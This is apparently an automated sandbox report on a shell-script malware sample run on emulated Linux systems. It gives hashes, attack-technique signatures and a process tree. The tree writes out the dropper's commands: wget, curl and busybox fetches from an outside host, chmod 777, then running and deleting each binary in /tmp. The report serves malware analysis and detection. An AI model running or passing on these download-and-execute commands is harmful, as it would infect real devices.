Analysis
-
max time kernel
95s -
max time network
98s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21/10/2024, 01:37
Static task
static1
Behavioral task
behavioral1
Sample
aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh
-
Size
10KB
-
MD5
b7a267850033267bf2b5b7dcddd0b525
-
SHA1
61a2fbb38abff8595a890118cfbee817ea1557f9
-
SHA256
aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b
-
SHA512
adc6f56adb04ebd6bbbdfaaa2e4ca770c59d4abe79734c66fd76c9dd7545685d863952a03b577850049a0fd637107ae75663742043d531d2fcd1eaf825cf2aac
-
SSDEEP
192:aJpwLnbU9swNa6EWdSWnPj+mBw8WSWnS+mBw8/JpwLnWswNa6I:BUEWdSWnPj+mBw8WSWnS+mBw8C
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 845 chmod 911 chmod 939 chmod 821 chmod 925 chmod 953 chmod 831 chmod 903 chmod 932 chmod 983 chmod 997 chmod 896 chmod 946 chmod 961 chmod 1004 chmod 990 chmod 732 chmod 866 chmod 889 chmod 976 chmod 838 chmod 852 chmod 859 chmod 874 chmod 881 chmod 969 chmod 784 chmod 918 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE 733 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ 785 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K 822 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 832 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce 839 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl 846 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ 853 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 860 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa 867 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI 875 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 882 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr 890 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs 897 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 904 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 912 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa 919 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI 926 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ 933 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr 940 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs 947 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 954 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 962 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ 970 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K 977 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE 984 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce 991 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl 998 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 1005 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 871 curl 952 busybox 1001 curl 865 busybox 908 curl 842 curl 885 wget 922 curl 931 busybox 972 wget 994 curl 837 busybox 893 curl 902 busybox 825 curl 849 curl 855 wget 862 wget 899 wget 914 wget 993 wget 1000 wget 787 wget 851 busybox 886 curl 895 busybox 783 busybox 824 wget 834 wget 844 busybox 900 curl 907 wget 980 curl 731 busybox 888 busybox 921 wget 942 wget 965 wget 1003 busybox 841 wget 973 curl 979 wget 863 curl 781 curl 848 wget 858 busybox 935 wget 936 curl 938 busybox 950 curl 717 curl 975 busybox 989 busybox 915 curl 798 busybox 835 curl 870 wget 910 busybox 917 busybox 968 busybox 709 wget 928 wget 945 busybox 982 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K curl File opened for modification /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 curl File opened for modification /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl curl File opened for modification /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 curl File opened for modification /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ curl File opened for modification /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI curl File opened for modification /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 curl File opened for modification /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ curl File opened for modification /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr curl File opened for modification /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce curl File opened for modification /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl curl File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 curl File opened for modification /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ curl File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa curl File opened for modification /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs curl File opened for modification /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE curl File opened for modification /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 curl File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 curl File opened for modification /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 curl File opened for modification /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr curl File opened for modification /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI curl File opened for modification /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 curl File opened for modification /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K curl File opened for modification /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce curl File opened for modification /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE curl File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa curl File opened for modification /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs curl File opened for modification /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ curl
Processes
-
/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh1⤵PID:699
-
/bin/rm/bin/rm bins.sh2⤵PID:702
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- System Network Configuration Discovery
PID:709
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:717
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- System Network Configuration Discovery
PID:731
-
-
/bin/chmodchmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- File and Directory Permissions Modification
PID:732
-
-
/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵
- Executes dropped EXE
PID:733
-
-
/bin/rmrm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE2⤵PID:734
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:735
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:781
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- System Network Configuration Discovery
PID:783
-
-
/bin/chmodchmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵
- Executes dropped EXE
PID:785
-
-
/bin/rmrm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ2⤵PID:786
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- System Network Configuration Discovery
PID:787
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:790
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- System Network Configuration Discovery
PID:798
-
-
/bin/chmodchmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K2⤵PID:823
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- System Network Configuration Discovery
PID:824
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:830
-
-
/bin/chmodchmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP82⤵PID:833
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- System Network Configuration Discovery
PID:834
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:835
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- System Network Configuration Discovery
PID:837
-
-
/bin/chmodchmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce2⤵PID:840
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- System Network Configuration Discovery
PID:841
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:842
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- System Network Configuration Discovery
PID:844
-
-
/bin/chmodchmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl2⤵PID:847
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- System Network Configuration Discovery
PID:848
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- System Network Configuration Discovery
PID:851
-
-
/bin/chmodchmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:854
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- System Network Configuration Discovery
PID:855
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- System Network Configuration Discovery
PID:858
-
-
/bin/chmodchmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:861
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- System Network Configuration Discovery
PID:865
-
-
/bin/chmodchmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:869
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- System Network Configuration Discovery
PID:870
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:873
-
-
/bin/chmodchmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:876
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:877
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:880
-
-
/bin/chmodchmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ02⤵PID:884
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- System Network Configuration Discovery
PID:885
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- System Network Configuration Discovery
PID:888
-
-
/bin/chmodchmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵PID:891
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:892
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- System Network Configuration Discovery
PID:895
-
-
/bin/chmodchmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs2⤵PID:898
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- System Network Configuration Discovery
PID:899
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- System Network Configuration Discovery
PID:902
-
-
/bin/chmodchmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG22⤵PID:906
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- System Network Configuration Discovery
PID:907
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- System Network Configuration Discovery
PID:910
-
-
/bin/chmodchmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K22⤵PID:913
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- System Network Configuration Discovery
PID:914
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- System Network Configuration Discovery
PID:917
-
-
/bin/chmodchmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa2⤵PID:920
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- System Network Configuration Discovery
PID:921
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:924
-
-
/bin/chmodchmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI2⤵PID:927
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- System Network Configuration Discovery
PID:928
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- System Network Configuration Discovery
PID:931
-
-
/bin/chmodchmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ2⤵PID:934
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- System Network Configuration Discovery
PID:935
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr2⤵
- System Network Configuration Discovery
PID:938
